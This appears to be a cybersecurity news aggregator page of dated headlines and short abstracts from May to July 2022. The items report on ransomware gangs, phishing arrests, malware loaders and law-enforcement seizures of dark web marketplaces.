Abstract The operators behind the TrickBot malware are systematically targeting Ukraine since the beginning of the war in February 2022. IBM researchers collected evidence indicating that the Russia-based cybercriminal Trickbot group (aka Wizard Spider, DEV-0193,...

Security Affairs

July 7, 2022

How cyber criminals are targeting Amazon Prime Day shoppers Full Text

Abstract In advance of this year’s Amazon Prime Day set for July 12 and 13, Check Point said it has seen a 37% jump in Amazon-related phishing attacks at the start of July compared with the daily average for June.

Tech Republic

July 06, 2022

Ransomware, hacking groups move from Cobalt Strike to Brute Ratel Full Text

Abstract Hacking groups and ransomware operations are moving away from Cobalt Strike to the newer Brute Ratel post-exploitation toolkit to evade detection by EDR and antivirus solutions.

BleepingComputer

July 5, 2022

Cyber Police of Ukraine arrested 9 men behind phishing attacks on Ukrainians attempting to capitalize on the ongoing conflict Full Text

Abstract The Cyber Police of Ukraine arrested nine members of a cybercriminal gang that has stolen 100 million hryvnias via phishing attacks. The Cyber Police of Ukraine arrested nine members of a cybercriminal organization that stole 100 million hryvnias...

Security Affairs

July 5, 2022

AstraLocker ransomware operators shut down their operations Full Text

Abstract AstraLocker ransomware operators told BleepingComputer they're shutting down their operations and are releasing decryptors. AstraLocker ransomware operators told BleepingComputer they're shutting down the operation and provided decryptors to the VirusTotal...

Security Affairs

July 4, 2022

Data of a billion Chinese residents available for sale on a cybercrime forum Full Text

Abstract Threat actors claim to have breached a database belonging to Shanghai police and stole the data of a billion Chinese residents. Unknown threat actors claimed to have obtained data of a billion Chinese residents after breaching a database of the Shanghai...

Security Affairs

July 04, 2022

Ukrainian Authorities Arrested Phishing Gang That Stole 100 Million UAH Full Text

Abstract The Cyber Police of Ukraine last week disclosed that it apprehended nine members of a criminal gang that embezzled 100 million hryvnias via hundreds of phishing sites that claimed to offer financial assistance to Ukrainian citizens as part of a campaign aimed at capitalizing on the ongoing conflict. "Criminals created more than 400 phishing links to obtain bank card data of citizens and appropriate money from their accounts," the agency  said  in a press statement last week. "The perpetrators may face up to 15 years behind bars." The law enforcement operation culminated in the seizure of computer equipment, mobile phones, bank cards as well as the criminal proceeds illicitly obtained through the scheme. Some of the rogue domains registered by the actors included ross0.yolasite[.]com, foundationua[.]com, ua-compensation[.]buzz, www.bless12[.]store, help-compensation[.]xyz, newsukraine10.yolasite[.]com, and euro24dopomoga0.yolasite[.]com, among others. The rogu

The Hacker News

July 03, 2022

HackerOne Employee Caught Stealing Vulnerability Reports for Personal Gains Full Text

Abstract Vulnerability coordination and bug bounty platform HackerOne on Friday disclosed that a former employee at the firm improperly accessed security reports submitted to it for personal gain. "The person anonymously disclosed this vulnerability information outside the HackerOne platform with the goal of claiming additional bounties," it  said . "In under 24 hours, we worked quickly to contain the incident by identifying the then-employee and cutting off access to data." The employee, who had access to HackerOne systems between April 4 and June 23, 2022, for triaging vulnerability disclosures associated with different customer programs, has since been terminated by the San Francisco-headquartered company as of June 30. Calling the incident as a "clear violation" of its values, culture, policies, and employment contracts, HackerOne said it was alerted to the breach on June 22 by an unnamed customer, which asked it to "investigate a suspicious vulnerabi

The Hacker News

June 30, 2022

Google Blocks Dozens of Malicious Domains Operated by Hack-for-Hire Groups Full Text

Abstract Google's Threat Analysis Group (TAG) on Thursday disclosed it had acted to block as many as 36 malicious domains operated by hack-for-hire groups from India, Russia, and the U.A.E. In a manner analogous to the  surveillanceware ecosystem , hack-for-hire firms equip their clients with capabilities to enable targeted attacks aimed at corporates as well as activists, journalists, politicians, and other high-risk users. Where the two stand apart is that while customers purchase the spyware from commercial vendors and then deploy it themselves, the operators behind hack-for-hire attacks are known to conduct the intrusions on their clients' behalf in order to obscure their role. "The hack-for-hire landscape is fluid, both in how the attackers organize themselves and in the wide range of targets they pursue in a single campaign at the behest of disparate clients," Shane Huntley, director of Google TAG,  said  in a report. "Some hack-for-hire attackers openly adver

The Hacker News

June 29, 2022

RansomHouse gang claims to have stolen 450GB of data from chip maker giant AMD Full Text

Abstract The RansomHouse gang claims to have breached the Chipmaker giant AMD and stole 450 GB of data from the company in 2021. The RansomHouse extortion gang claims to have stolen 450 GB of data from the chipmaker giant AMD in 2021 and threatens to leak...

Security Affairs

June 29, 2022

Ukraine arrests cybercrime gang operating over 400 phishing sites Full Text

Abstract The Ukrainian cyberpolice force arrested nine members of a criminal group that operated over 400 phishing websites crafted to appear like legitimate EU portals offering financial assistance to Ukrainians.

BleepingComputer

June 27, 2022

US, Brazil seize 272 websites used to illegally download music Full Text

Abstract The domains of six websites that streamed and provided illegal downloads of copyrighted music were seized by U.S. Homeland Security Investigations (HSI) and the Department of Justice.

BleepingComputer

June 27, 2022

Threat actors stole $100M in crypto assets from Harmony Full Text

Abstract Threat actors have stolen $100 million in cryptocurrency from the Blockchain company Harmony on Thursday evening. Last week threat actors have stolen $100 million in cryptocurrency from the Blockchain company Harmony. https://twitter.com/vxunderground/status/1540160287009038337 https://twitter.com/peckshield/status/1540215805366964224 The...

Security Affairs

June 26, 2022

Threat actors sell access to tens of vulnerable networks compromised by exploiting Atlassian 0day Full Text

Abstract A threat actor is selling access to 50 vulnerable networks that have been compromised exploiting the recently disclosed Atlassian Confluence zero-day. A threat actor is selling access to 50 vulnerable networks that have been compromised by exploiting...

Security Affairs

June 24, 2022

The price of stolen info: Everything on sale on the dark web Full Text

Abstract Privacy Affairs researchers concluded criminals using the dark web need only spend $1,115 for a complete set of a person’s account details, enabling them to create fake IDs and forge private documents, such as passports and driver’s licenses.

Help Net Security

June 23, 2022

Crypto Scammers Turn to LinkedIn to Target Victims Full Text

Abstract The scams work in a similar manner as on other platforms. Scammers create professional-looking fake profiles and attempt to strike up conversations with users using the in-built messaging feature.

Cyware Alerts - Hacker News

June 22, 2022

Europol Busts Phishing Gang Responsible for Millions in Losses Full Text

Abstract Europol on Tuesday announced the dismantling of an organized crime group that dabbled in phishing, fraud, scams, and money laundering activities. The cross-border operation, which involved law enforcement authorities from Belgium and the Netherlands, saw the arrests of nine individuals in the Dutch nation. The suspects are men between the ages of 25 and 36 from Amsterdam, Almere, Rotterdam, and Spijkenisse and a 25-year-old woman from Deventer, according to a  statement  from the National Police Force. Also confiscated as part of 24 house searches were firearms, ammunition, jewelry, designer clothing, expensive watches, electronic devices, tens of thousands of euros in cash, and cryptocurrency, the officials said. "The criminal group contacted victims by email, text message and through mobile messaging applications," the agency  noted . "These messages were sent by the members of the gang and contained a phishing link leading to a bogus banking website." Unsu

The Hacker News

June 22, 2022

Crooks are using RIG Exploit Kit to push Dridex instead of Raccoon stealer Full Text

Abstract Threat actors are using the Rig Exploit Kit to spread the Dridex banking trojan instead of the Raccoon Stealer malware. Since January 2022, the Bitdefender Cyber Threat Intelligence Lab observed operators behind the RIG Exploit Kit pushing the Dridex...

Security Affairs

June 21, 2022

Phishing gang behind millions in losses dismantled by police Full Text

Abstract Members of a phishing gang behind millions of euros in losses were arrested today following a law enforcement operation coordinated by the Europol. 

BleepingComputer

June 21, 2022

Avos Ransomware Group Expands Attack Arsenal to VMware Horizon Access Gateways Full Text

Abstract The initial ingress point was a pair of VMWare Horizon Unified Access Gateways that were vulnerable to Log4Shell. The attackers utilized several different tools, including Cobalt Strike, Sliver, and multiple commercial network scanners.

Cisco Talos

June 20, 2022

What do Ransomware Actors Want? Full Text

Abstract The Pain Points: Ransomware Data Disclosure Trends by Rapid7 uncovers the kind of data ransomware actors want and how they pressure victims into getting it back by paying a ransom.

Cyware Alerts - Hacker News

June 20, 2022

New ‘BidenCash’ site sells your stolen credit card for just 15 cents Full Text

Abstract A recently launched carding site called 'BidenCash' is trying to get notoriety by leaking credit card details along with information about their owners.

BleepingComputer

June 17, 2022

Cyberattackers Using MonkeyPox-Themed Attacks to Lure Victims Full Text

Abstract Cybercriminals are using monkeypox outbreaks to fool victims into disclosing their personal information. Monkeypox is high on the news agenda and has people’s attention. The email claims that their organization has been monitoring the spread of the disease in the local area, and the updates provide ... Read More

Cyware Alerts - Hacker News

June 16, 2022

BlackCat Ransomware Gang Targeting Unpatched Microsoft Exchange Servers Full Text

Abstract Microsoft is warning that the BlackCat ransomware crew is leveraging exploits for  unpatched Exchange server  vulnerabilities to gain access to targeted networks. Upon gaining an entry point, the attackers swiftly moved to gather information about the compromised machines, followed by carrying out credential theft and lateral movement activities, before harvesting intellectual property and dropping the ransomware payload. The entire sequence of events played out over the course of two full weeks, the Microsoft 365 Defender Threat Intelligence Team  said  in a report published this week. "In another incident we observed, we found that a ransomware affiliate gained initial access to the environment via an internet-facing Remote Desktop server using compromised credentials to sign in," the researchers said, pointing out how "no two BlackCat 'lives' or deployments might look the same." BlackCat , also known by the names ALPHV and Noberus, is a relatively n

The Hacker News

June 16, 2022

ALPHV/BlackCat ransomware gang starts publishing victims’ data on the clear web Full Text

Abstract ALPHV/BlackCat ransomware group began publishing victims' data on the clear web to increase the pressure on them and force them to pay the ransom. ALPHV/BlackCat ransomware group has adopted a new strategy to force victims into paying the ransom,...

Security Affairs

June 15, 2022

DragonForce Gang Unleash Hacks Against Govt. of India Full Text

Abstract In response to a comment about the Prophet Mohammed, a hacktivist group in Malaysia has unleashed a wave of cyber attacks in India.

Threatpost

June 15, 2022

Interpol seizes $50 million, arrests 2000 social engineers Full Text

Abstract An international law enforcement operation, codenamed 'First Light 2022,' has seized 50 million dollars and arrested thousands of people involved in social engineering scams worldwide.

BleepingComputer

June 14, 2022

Ransomware gang creates site for employees to search for their stolen data Full Text

Abstract The ALPHV ransomware gang, aka BlackCat, has brought extortion to a new level by creating a dedicated website that allows the customers and employees of their victim to check if their data was stolen in an attack

BleepingComputer

June 14, 2022

Researchers Detail PureCrypter Loader Cyber Criminals Using to Distribute Malware Full Text

Abstract Cybersecurity researchers have detailed the workings of a fully-featured malware loader dubbed  PureCrypter  that's being purchased by cyber criminals to deliver remote access trojans (RATs) and information stealers. "The loader is a .NET executable obfuscated with SmartAssembly and makes use of compression, encryption, and obfuscation to evade antivirus software products," Zscaler's Romain Dumont  said  in a new report. Some of the malware families distributed using PureCrypter include  Agent Tesla ,  Arkei ,  AsyncRAT ,  AZORult ,  DarkCrystal RAT  (DCRat),  LokiBot ,  NanoCore ,  RedLine Stealer ,  Remcos ,  Snake Keylogger , and  Warzone RAT . Sold for a price of $59 by its developer named "PureCoder" for a one-month plan (and $249 for a one-off lifetime purchase) since at least March 2021, PureCrypter is advertised as the "only crypter in the market that uses offline and online delivery technique." Crypters act as the  first layer of de

The Hacker News

June 12, 2022

Ransomware gangs are exploiting CVE-2022-26134 RCE in Atlassian Confluence servers Full Text

Abstract Ransomware gangs are actively exploiting CVE-2022-26134 remote code execution (RCE) flaw in Atlassian Confluence Server and Data Center. Multiple ransomware groups are actively exploiting the recently disclosed remote code execution (RCE) vulnerability,...

Security Affairs

June 11, 2022

Microsoft Derails Bohrium Hackers’ Spear-phishing Operation Full Text

Abstract The Microsoft Digital Crimes Unit has dismantled a spear-phishing campaign run by an Iranian threat actor Bohrium to target users in the U.S., Middle East, and India. Bohrium actors often create fake social media profiles, often posing as recruiters. The companies need to stay vigilant to keep them ... Read More

Cyware Alerts - Hacker News

June 10, 2022

Researchers Detail How Cyber Criminals Targeting Cryptocurrency Users Full Text

Abstract Cybercriminals are impersonating popular crypto platforms such as Binance, Celo, and Trust Wallet with spoofed emails and fake login pages in an attempt to steal login details and deceptively transfer virtual funds. "As cryptocurrency and non-fungible tokens (NFTs) become more mainstream, and capture headlines for their volatility, there is a greater likelihood of more individuals falling victim to fraud attempting to exploit people for digital currencies," Proofpoint  said  in a new report. "The rise and proliferation of cryptocurrency has also provided attackers with a new method of financial extraction." The targeting of sensitive cryptocurrency data by threat actors was recently echoed by the Microsoft 365 Defender Research Team, which warned about the emerging threat of  cryware  wherein private keys, seed phrases, and wallet addresses are plundered with the goal of siphoning virtual currencies by means of fraudulent transfers. The  swift popularity of We

The Hacker News

June 10, 2022

Vice Society ransomware gang adds the Italian City of Palermo to its data leak site Full Text

Abstract The Vice Society group has claimed responsibility for the ransomware attack that hit the Italian city of Palermo forcing the IT admins to shut down its infrastructure. The Vice Society ransomware group has claimed responsibility for the recent cyber...

Security Affairs

June 09, 2022

Dark web sites selling alleged Western weapons sent to Ukraine Full Text

Abstract Several weapon marketplaces on the dark web have listed military-grade firearms allegedly coming from Western countries that sent them to support the Ukrainian army in its fight against the Russian invaders.

BleepingComputer

June 8, 2022

US dismantled and seized SSNDOB cybercrime marketplace Full Text

Abstract An international operation led by the US authorities dismantled and seized the infrastructure of the online marketplace SSNDOB. US DoJ announced the seizure of the SSNDOB Marketplace, a series of websites offering personal information, including...

Security Affairs

June 8, 2022

Cuba Ransomware Group’s New Variant Found Using Optimized Infection Techniques Full Text

Abstract While the updates did not change much in terms of overall functionality, researchers believe that it aims to optimize its execution, minimize unintended system behavior, and provide technical support to ransomware victims if they choose to negotiate.

Trend Micro

June 07, 2022

FBI Seizes ‘SSNDOB’ ID Theft Service for Selling Personal Info of 24 Million People Full Text

Abstract An illicit online marketplace known as SSNDOB was taken down in operation led by U.S. law enforcement agencies, the Department of Justice (DoJ) announced Tuesday. SSNDOB trafficked in personal information such as names, dates of birth, credit card numbers, and Social Security numbers of about 24 million individuals in the U.S., generating its operators $19 million in sales revenue. The action saw the seizure of several domains associated with the marketplace — ssndob.ws, ssndob.vip, ssndob.club, and blackjob.biz — in cooperation with authorities from Cyprus and Latvia. According to blockchain analytics firm  Chainalysis , SSNDOB's Bitcoin payment processing system has received nearly $22 million worth of Bitcoin across over 100,000 transactions since April 2015. Furthermore, bitcoin transfers to the tune of more than $100,000 have been unearthed between SSNDOB and  Joker's Stash , another darknet market that specialized in stolen credit card information and voluntarily c

The Hacker News

June 07, 2022

US seizes SSNDOB market for selling personal info of 24 million people Full Text

Abstract SSNDOB, an online marketplace that sold the names, social security numbers, and dates of birth of approximately 24 million US people, has been taken offline following an international law enforcement operation.

BleepingComputer

June 07, 2022

Evil Corp Cybercrime Group Shifts to LockBit Ransomware to Evade Sanctions Full Text

Abstract The threat cluster dubbed UNC2165, which shares numerous overlaps with a Russia-based cybercrime group known as Evil Corp, has been linked to multiple LockBit ransomware intrusions in an attempt to get around  sanctions  imposed by the U.S. Treasury in December 2019. "These actors have shifted away from using exclusive ransomware variants to LockBit — a well-known ransomware as a service (RaaS) — in their operations, likely to hinder attribution efforts in order to evade sanctions," threat intelligence firm Mandiant  noted  in an analysis last week. Active since 2019, UNC2165 is known to obtain initial access to victim networks via stolen credentials and a JavaScript-based downloader malware called  FakeUpdates  (aka SocGholish), leveraging it to previously deploy  Hades  ransomware. Hades is the work of a financially motivated hacking group named Evil Corp, which is also called by the monikers Gold Drake and Indrik Spider and has been attributed to the infamous  Dridex

The Hacker News

June 7, 2022

QBot Delivers Black Basta Ransomware Full Text

Abstract NCC Group has reported that the Black Basta ransomware group has formed an alliance with QBot for lateral movement across the target network. Additionally, the attackers were spotted using Cobalt Strike beacons during the compromise. QBot is still propagated via malicious emails, users should stay ... Read More

Cyware Alerts - Hacker News

June 7, 2022

Black Basta ransomware operators leverage QBot for lateral movements Full Text

Abstract The QBot malware operation has partnered with Black Basta ransomware group to target organizations worldwide. Researchers from NCC Group spotted a new partnership in the threat landscape between the Black Basta ransomware group and the QBot malware...

Security Affairs

June 06, 2022

QBot now pushes Black Basta ransomware in bot-powered attacks Full Text

Abstract The Black Basta ransomware gang has partnered with the QBot malware operation to gain spread laterally through hacked corporate environments.

BleepingComputer

June 6, 2022

Evil Corp Shifts to LockBit to Evade Sanctions Full Text

Abstract In 2019, the U.S. Treasury issued sanctions against 17 individuals and seven entities of Evil Corp cyber operations for causing financial losses of more than $100 million with the Dridex malware. 

Cyware Alerts - Hacker News

June 06, 2022

Ransomware gangs now give victims time to save their reputation Full Text

Abstract Threat analysts have observed an unusual trend in ransomware group tactics, reporting that initial phases of victim extortion are becoming less open to the public as the actors tend to use hidden or anonymous entries.

BleepingComputer

June 6, 2022

Microsoft Shuts Down Bohrium and Polonium Operations Full Text

Abstract Microsoft Digital Crimes Unit (DCU) has successfully dismantled a spear-phishing operation associated with an Iranian threat actor, named Bohrium, that targeted customers in the Middle East, the U.S., and India.

Cyware Alerts - Hacker News

June 6, 2022

AlphaBay Is Taking Over the Dark Web—Again Full Text

Abstract In July 2017, a global law enforcement sting called Operation Bayonet took down AlphaBay’s sprawling marketplace, seizing the site’s central server in Lithuania and arresting its creator, Alexandre Cazes, outside his home in Bangkok.

Wired

June 03, 2022

Microsoft disrupts Bohrium hackers’ spear-phishing operation Full Text

Abstract The Microsoft Digital Crimes Unit (DCU) has disrupted a spear-phishing operation linked to an Iranian threat actor tracked as Bohrium that targeted customers in the U.S., Middle East, and India.

BleepingComputer

June 3, 2022

Access Brokers and Ransomware-as-a-Service Gangs Tighten Relationships Full Text

Abstract Dark web watchers have noted the increasing professionalism of cybercrime groups over the last few years. Criminal groups are well-organized and have just one purpose: streamlining operations to maximize profits.

Security Week

June 3, 2022

Clipminer Botnet Operators Rake in $1.7 Million Through Cryptomining Full Text

Abstract Spreading via trojanized cracked or pirated software, the Clipminer trojan shows similarities with the cryptomining trojan KryptoCibule, suggesting that it could be either a copycat or an evolution of the latter.

Security Week

June 02, 2022

Evil Corp switches to LockBit ransomware to evade sanctions Full Text

Abstract The Evil Corp cybercrime group has now switched to deploying LockBit ransomware on targets' networks to evade sanctions imposed by the U.S. Treasury Department's Office of Foreign Assets Control (OFAC).

BleepingComputer

June 02, 2022

Ransomware gang now hacks corporate websites to show ransom notes Full Text

Abstract A ransomware gang is taking extortion to a new level by publicly hacking corporate websites to publicly display ransom notes.

BleepingComputer

June 02, 2022

Conti Leaks Reveal Ransomware Gang’s Interest in Firmware-based Attacks Full Text

Abstract An analysis of  leaked chats  from the notorious  Conti ransomware group  earlier this year has revealed that the syndicate has been working on a set of firmware attack techniques that could offer a path to accessing privileged code on compromised devices. "Control over firmware gives attackers virtually unmatched powers both to directly cause damage and to enable other long-term strategic goals," firmware and hardware security firm Eclypsium  said  in a report shared with The Hacker News. "Such level of access would allow an adversary to cause irreparable damage to a system or to establish ongoing persistence that is virtually invisible to the operating system." Specifically, this includes attacks aimed at embedded microcontrollers such as the Intel  Management Engine  ( ME ), a privileged component that's part of the company's processor chipsets and which can completely bypass the operating system. It's worth noting that the reason for this evolv

The Hacker News

June 2, 2022

An international police operation dismantled FluBot spyware Full Text

Abstract An international law enforcement operation involving 11 countries resulted in the takedown of the FluBot Android malware. An international law enforcement operation involving 11 countries led to the takedown of the infamous FluBot Android malware....

Security Affairs

June 02, 2022

Clipminer malware gang stole $1.7M by hijacking crypto payments Full Text

Abstract Threat analysts have discovered a large operation of a new cryptocurrency mining malware called Clipminer that brought its operators at least $1.7 million from transaction hijacking.

BleepingComputer

June 1, 2022

New Activities by Clop and REvil - Copycats or Final Wrapups? Full Text

Abstract Two prominent ransomware groups, Clop and REvil, had claimed to have shut down but there are some activities that suggest cybercriminals may have not gone completely. Clop had an unexpected return with a jump from the least active threat in March to the fourth most active in April. The so-thought- ... Read More

Cyware Alerts - Hacker News

June 01, 2022

FBI seizes domains used to sell stolen data, DDoS services Full Text

Abstract The Federal Bureau of Investigation (FBI) and the U.S. Department of Justice announced today the seizure of three domains used by cybercriminals to sell personal info stolen in data breaches and to provide DDoS attack services.

BleepingComputer

May 30, 2022

Interpol Nabs 3 Nigerian Scammers Behind Malware-based Attacks Full Text

Abstract Interpol on Monday announced the arrest of three suspected global scammers in Nigeria for using remote access trojans (RATs) such as Agent Tesla to facilitate malware-enabled cyber fraud. "The men are thought to have used the RAT to reroute financial transactions, stealing confidential online connection details from corporate organizations, including oil and gas companies in South East Asia, the Middle East and North Africa," the International Criminal Police Organization  said  in a statement. One of the scammers in question, named Hendrix Omorume, has been charged and convicted of three counts of financial fraud and has been sentenced to a 12-month prison term. The two other suspects are still on trial. The three Nigerian individuals, who are aged between 31 and 38, have been apprehended for being in possession of fake documents such as fraudulent invoices and forged official letters. The law enforcement said that the suspects systematically used Agent Tesla to breach

The Hacker News

May 30, 2022

Three Nigerian men arrested in INTERPOL Operation Killer Bee Full Text

Abstract Interpol arrested three Nigerian men in Lagos, who are suspected of using the Agent Tesla RAT to reroute financial transactions and steal sensitive data. Interpol arrested 3 Nigerian men in Lagos, as part of an international operation codenamed Killer...

Security Affairs

May 29, 2022

New Yorker imprisoned for role in carding group behind $568M damages Full Text

Abstract John Telusma, a 37-year-old man from New York, was sentenced to four years in prison for selling and using stolen and compromised credit cards on the Infraud carding portal operated by the transnational cybercrime organization with the same name.

BleepingComputer

May 28, 2022

Industrial Spy: Data Extortion Marketplace Ventures into Ransomware Full Text

Abstract MalwareHunterTeam discovered a new malware sample containing a ransom note instead of a promotional text. The note states that the gang has stolen the victim’s data, along with encrypting it.

Cyware Alerts - Hacker News

May 28, 2022

Clop ransomware gang is back, hits 21 victims in a single month Full Text

Abstract After effectively shutting down their entire operation for several months, between November and February, the Clop ransomware is now back according to NCC Group researchers.

BleepingComputer

May 28, 2022

The strange link between Industrial Spy and the Cuba ransomware operation Full Text

Abstract The recently launched Industrial Spy data extortion marketplace has now started its ransomware operation. In April, Malware HunterTeam and Bleeping Computer reported the launch of a new dark web marketplace called Industrial Spy that sells stolen...

Security Affairs

May 27, 2022

Exposed: the threat actors who are poisoning Facebook Full Text

Abstract An investigation of the infamous “Is That You?” video scam has led Cybernews researchers to a cybercriminal stronghold, from which threat actors have been infecting the social media giant with thousands of malicious links every day.

Security Affairs

May 25, 2022

Interpol Arrest Leader of SilverTerrier Cybercrime Gang Behind BEC Attacks Full Text

Abstract A year-long international investigation has resulted in the arrest of the suspected head of the SilverTerrier cybercrime group by the Nigeria Police Force. "The suspect is alleged to have run a transnational cybercrime syndicate that launched mass phishing campaigns and business email compromise schemes targeting companies and individual victims," Interpol  said  in a statement. Operation Delilah, as the coordinated international effort is called, involved tracking the 37-year-old Nigerian man's physical movements, before he was apprehended at Murtala Mohammed International Airport in Lagos. Singapore-headquartered cybersecurity company Group-IB said it provided threat intelligence that led to the arrest as part of the police operation that commenced in May 2021. The development is the third in a series of law enforcement actions aimed at the identification and arrest of the suspected members of the SilverTerrier gang (aka TMT). In November 2020, three alleged m

The Hacker News

May 25, 2022

Darknet market Versus shuts down after hacker leaks security flaw Full Text

Abstract ​The Versus Market, one of the most popular English-speaking criminal darknet markets, is shutting down after discovering a severe exploit that could have allowed access to its database and exposed the IP address of its servers.

BleepingComputer

May 25, 2022

Internationa police operation led to the arrest of the SilverTerrier gang leader Full Text

Abstract The Nigeria Police Force has arrested the suspected leader of the SilverTerrier cybercrime group as a result of an international operation. The Nigeria Police Force has arrested the suspected leader of the SilverTerrier cybercrime gang (aka TMT) after...

Security Affairs

May 24, 2022

Conti Ransomware Operation Shut Down After Splitting into Smaller Groups Full Text

Abstract Even as the operators of Conti threatened to  overthrow the Costa Rican government , the notorious cybercrime gang officially took down their infrastructure in favor of migrating their criminal activities to other ancillary operations, including Karakurt and BlackByte. "From the negotiations site, chatrooms, messengers to servers and proxy hosts - the Conti brand, not the organization itself, is shutting down," AdvIntel researchers Yelisey Bogusalvskiy and Vitali Kremez  said  in a report. "However, this does not mean that the threat actors themselves are retiring." The voluntary termination, with the exception of its name-and-shame blog, is said to have occurred on May 19, 2022, while an organizational rejig was happening simultaneously to ensure a smooth transition of the ransomware group's members. AdvIntel said Conti, which is also tracked under the moniker  Gold Ulrick , orchestrated its own demise by utilizing information warfare techniques. The disb

The Hacker News

May 24, 2022

Microsoft Warns of Web Skimmers Mimicking Google Analytics and Meta Pixel Code Full Text

Abstract Threat actors behind web skimming campaigns are leveraging malicious JavaScript code that mimics Google Analytics and Meta Pixel scripts in an attempt to sidestep detection. "It's a shift from earlier tactics where attackers conspicuously injected malicious scripts into e-commerce platforms and content management systems (CMSs) via vulnerability exploitation, making this threat highly evasive to traditional security solutions," Microsoft 365 Defender Research Team  said  in a new report. Skimming attacks, such as those by Magecart, are carried out with the goal of harvesting and exporting users' payment information, such as credit card details, entered into online payment forms in e-commerce platforms, typically during the checkout process. This is achieved by taking advantage of security vulnerabilities in third-party plugins and other tools to inject rogue JavaScript code into the online portals without the owners' knowledge. As skimming attacks have incre

The Hacker News

May 23, 2022

New RansomHouse group sets up extortion market, adds first victims Full Text

Abstract Yet another data-extortion cybercrime operation has appeared on the darknet named 'RansomHouse' where threat actors publish evidence of stolen files and leak data of organizations that refuse to make a ransom payment.

BleepingComputer

May 22, 2022

Chinese “Twisted Panda” Hackers Caught Spying on Russian Defense Institutes Full Text

Abstract At least two research institutes located in Russia and a third likely target in Belarus have been at the receiving end of an espionage attack by a Chinese nation-state advanced persistent threat (APT). The attacks, codenamed " Twisted Panda ," come in the backdrop of Russia's military invasion of Ukraine, prompting a  wide range  of  threat actors  to swiftly adapt their campaigns on the ongoing conflict to distribute malware and stage opportunistic attacks. They have materialized in the form of social engineering schemes with topical war and sanctions-themed baits orchestrated to trick potential victims into clicking malicious links or opening weaponized documents. Israeli cybersecurity firm Check Point, which  disclosed  details of the latest intelligence-gathering operation, attributed it a Chinese threat actor, with connections to that of  Stone Panda  (aka  APT 10 , Cicada, or Potassium) and  Mustang Panda  (aka Bronze President, HoneyMyte, or RedDelta). Callin

The Hacker News

May 21, 2022

New Details About Wizard Spider Emerge Full Text

Abstract First detected in 2017, Wizard Spider has come a long way. A recent investigation by Prodaft revealed that the gang is one of the wealthiest ones and its assets exceed hundreds of millions of dollars.

Cyware Alerts - Hacker News

May 19, 2022

Conti ransomware shuts down operation, rebrands into smaller units Full Text

Abstract The notorious Conti ransomware gang has officially shut down their operation, with infrastructure taken offline and team leaders told that the brand is no more.

BleepingComputer

May 19, 2022

Ransomware gangs rely more on weaponizing vulnerabilities Full Text

Abstract Security researchers are warning that external remote access services continue to be the main vector for ransomware gangs to breach company networks.

BleepingComputer

May 18, 2022

Spanish police dismantle phishing gang that emptied bank accounts Full Text

Abstract The Spanish police have announced the arrest of 13 people and the launch of investigations on another 7 for their participation in a phishing ring that defrauded at least 146 people.

BleepingComputer

May 18, 2022

Researchers Expose Inner Workings of Billion-Dollar Wizard Spider Cybercrime Gang Full Text

Abstract The inner workings of a cybercriminal group known as the Wizard Spider have been exposed, shedding light on its organizational structure and motivations. "Most of Wizard Spider's efforts go into hacking European and U.S. businesses, with a special cracking tool used by some of their attackers to breach high-value targets," Swiss cybersecurity company PRODAFT  said  in a new report shared with The Hacker News. "Some of the money they get is put back into the project to develop new tools and talent." Wizard Spider, also known as Gold Blackburn, is believed to operate out of Russia and refers to a financially motivated threat actor that's been linked to the TrickBot botnet, a modular malware that was  officially discontinued  earlier this year in favor of improved malware such as BazarBackdoor. That's not all. The TrickBot operators have also extensively cooperated with  Conti , another Russia-linked cybercrime group notorious for offering ransomware-a

The Hacker News

May 18, 2022

US recovers $15 million from global Kovter ad fraud operation Full Text

Abstract The US government has recovered over $15 million from Swiss bank accounts belonging to operators behind the '3ve' online advertising fraud scheme.

BleepingComputer

May 18, 2022

Conti Ransomware gang threatens to overthrow the government of Costa Rica Full Text

Abstract The Conti ransomware gang is threatening to 'overthrow' the new government of Costa Rica after last month's attack. Last month, the Conti ransomware gang claimed responsibility for the attack on Costa Rica government infrastructure after that the government...

Security Affairs

May 18, 2022

Fake crypto sites lure wannabe thieves by spamming login credentials Full Text

Abstract Threat actors are luring potential thieves by spamming login credentials for other people account's on fake crypto trading sites, illustrating once again, that there is no honor among thieves.

BleepingComputer

May 15, 2022

Ukrainian Hacker Jailed for 4-Years in U.S. for Selling Access to Hacked Servers Full Text

Abstract A 28-year-old Ukrainian national has been sentenced to four years in prison for siphoning thousands of server login credentials and selling them on the dark web for monetary gain as part of a credential theft scheme. Glib Oleksandr Ivanov-Tolpintsev , who pleaded guilty to his offenses earlier this February, was arrested in Poland in October 2020, before being  extradited to the U.S.  in September 2021. The illegal sale involved the trafficking of login credentials to servers located across the world and personally identifiable information such as dates of birth and Social Security numbers belonging to U.S. residents on a darknet marketplace. The unnamed site purportedly offered over 700,000 compromised servers for sale, including at least 150,000 in the U.S. alone. Believed to have been operational from around October 2014, the underground marketplace was seized by law enforcement authorities on January 24, 2019, according to court documents. This exactly coincides with the dism

The Hacker News

May 14, 2022

These ransomware attackers sent their ransom note to the victim’s printer Full Text

Abstract Researchers have detailed a string of cyberattacks involving ransomware which took place in early 2022 to an Iranian hacking group they refer to as Cobalt Mirage – also known as APT35, Charming Kitten, Phosphorus, and TA453 by other research groups.

ZDNet

May 13, 2022

New Clues Indicate REvil is All Set for a Comeback Full Text

Abstract The once defunct REvil ransomware is indeed back on the scene as researchers throw light on new developments. The latest version of the malware tracked as 2.08 boasts some key modifications. Organizations must stay ahead of such threats and bolster their defense systems to thwart future ransomware ... Read More

Cyware Alerts - Hacker News

May 11, 2022

Conti’s Wrath Causes Havoc Across the Globe Full Text

Abstract Conti becomes the most wanted cybercriminal gang right now on the dark web with the U.S. announcing a $15 million bounty for information on its members. The group has stirred national security concerns in Costa Rica. Further, Conti claims to have leaked intelligence data from the go ... Read More

Cyware Alerts - Hacker News

May 10, 2022

New REvil Samples Indicate Ransomware Gang is Back After Months of Inactivity Full Text

Abstract The notorious ransomware operation known as REvil (aka Sodin or Sodinokibi) has resumed after six months of inactivity, an analysis of new ransomware samples has revealed. "Analysis of these samples indicates that the developer has access to REvil's source code, reinforcing the likelihood that the threat group has reemerged," researchers from Secureworks Counter Threat Unit (CTU)  said  in a report published Monday. "The identification of multiple samples with varying modifications in such a short period of time and the lack of an official new version indicates that REvil is under heavy active development once again." REvil, short for Ransomware Evil, is a ransomware-as-a-service (RaaS) scheme and attributed to a Russia-based/speaking group known as  Gold Southfield , arising just as  GandCrab  activity declined and the latter announced their retirement. It's also one of the earliest groups to adopt the double extortion scheme in which stolen data from

The Hacker News

May 10, 2022

